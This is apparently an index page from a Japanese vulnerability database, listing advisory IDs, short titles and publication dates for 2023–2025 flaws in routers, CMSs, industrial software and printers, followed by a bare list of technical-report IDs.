jvndb-2025-000004 Multiple vulnerabilities in I-O DATA router UD-LT2 2025-01-22T13:55+09:00 2025-02-20T15:55+09:00
jvndb-2025-000014 Multiple cross-site scripting vulnerabilities in Movable Type 2025-02-19T16:19+09:00 2025-02-19T16:19+09:00
jvndb-2025-000015 RevoWorks SCVX and RevoWorks Browser vulnerable to incorrect resource transfer between spheres 2025-02-19T14:51+09:00 2025-02-19T14:51+09:00
jvndb-2025-001563 Out-of-bounds write vulnerability in FUJIFILM Business Innovation Corp. MFPs 2025-02-18T16:33+09:00 2025-02-18T16:33+09:00
jvndb-2025-001562 Out-of-bounds read vulnerability in OMRON CX-Programmer 2025-02-18T16:24+09:00 2025-02-18T16:24+09:00
jvndb-2024-000114 Multiple vulnerabilities in baserCMS 2024-10-25T15:07+09:00 2025-02-18T15:35+09:00
jvndb-2025-001548 Out-of-bounds read vulnerability in Cente middleware 2025-02-17T18:22+09:00 2025-02-17T18:22+09:00
jvndb-2025-000012 Multiple vulnerabilities in The LuxCal Web Calendar 2025-02-17T13:43+09:00 2025-02-17T13:43+09:00
jvndb-2025-000013 acmailer CGI and acmailer DB vulnerable to OS command injection 2025-02-14T16:39+09:00 2025-02-14T16:39+09:00
jvndb-2025-000002 Multiple vulnerabilities in NEC Aterm series (NV25-003) 2025-02-14T15:48+09:00 2025-02-14T15:48+09:00
jvndb-2023-002797 Multiple vulnerabilities in ELECOM and LOGITEC network devices 2023-08-15T11:54+09:00 2025-02-13T15:21+09:00
jvndb-2024-001061 ELECOM wireless LAN routers vulnerable to OS command injection 2024-01-24T17:16+09:00 2025-02-13T14:31+09:00
jvndb-2025-000011 Multiple vulnerabilities in FileMegane 2025-02-13T13:39+09:00 2025-02-13T13:39+09:00
jvndb-2025-000010 acmailer vulnerable to cross-site scripting 2025-02-12T15:05+09:00 2025-02-12T15:05+09:00
jvndb-2024-000078 Multiple vulnerabilities in ELECOM wireless LAN routers 2024-07-30T15:34+09:00 2025-02-12T14:34+09:00
jvndb-2025-001017 Multiple vulnerabilities in STEALTHONE D220/D340/D440 2025-02-06T18:27+09:00 2025-02-06T18:27+09:00
jvndb-2025-001016 OMRON NJ/NX series vulnerable to path traversal 2025-02-06T18:27+09:00 2025-02-06T18:27+09:00
jvndb-2025-001018 Improper restriction of XML external entity reference (XXE) vulnerability in OMRON NB-Designer 2025-02-06T18:26+09:00 2025-02-06T18:26+09:00
jvndb-2025-000008 Multiple vulnerabilities in Defense Platform Home Edition 2025-02-05T14:06+09:00 2025-02-05T14:06+09:00
jvndb-2025-000009 WordPress Plugin "Activity Log WinterLock" vulnerable to cross-site request forgery 2025-02-04T13:58+09:00 2025-02-04T13:58+09:00
jvndb-2025-001244 Clickjacking Vulnerability in JP1/ServerConductor/Deployment Manager 2025-01-30T18:19+09:00 2025-01-30T18:19+09:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
ts-2025-001 TS-2025-001
ts-2024-013 TS-2024-013
ts-2024-012 TS-2024-012
ts-2024-011 TS-2024-011
ts-2024-010 TS-2024-010
ts-2024-009 TS-2024-009
ts-2024-008 TS-2024-008
ts-2024-007 TS-2024-007
ts-2024-006 TS-2024-006
ts-2024-005 TS-2024-005
ts-2024-004 TS-2024-004
ts-2024-003 TS-2024-003
ts-2024-002 TS-2024-002
ts-2024-001 TS-2024-001
ts-2023-009 TS-2023-009
ts-2023-008 TS-2023-008
ts-2023-007 TS-2023-007
ts-2023-006 TS-2023-006
ts-2023-005 TS-2023-005
ts-2023-004 TS-2023-004
ts-2023-003 TS-2023-003
ts-2023-002 TS-2023-002
ts-2023-001 TS-2023-001
ts-2022-005 TS-2022-005
ts-2022-004 TS-2022-004
ts-2022-003 TS-2022-003
ts-2022-002 TS-2022-002
ts-2022-001 TS-2022-001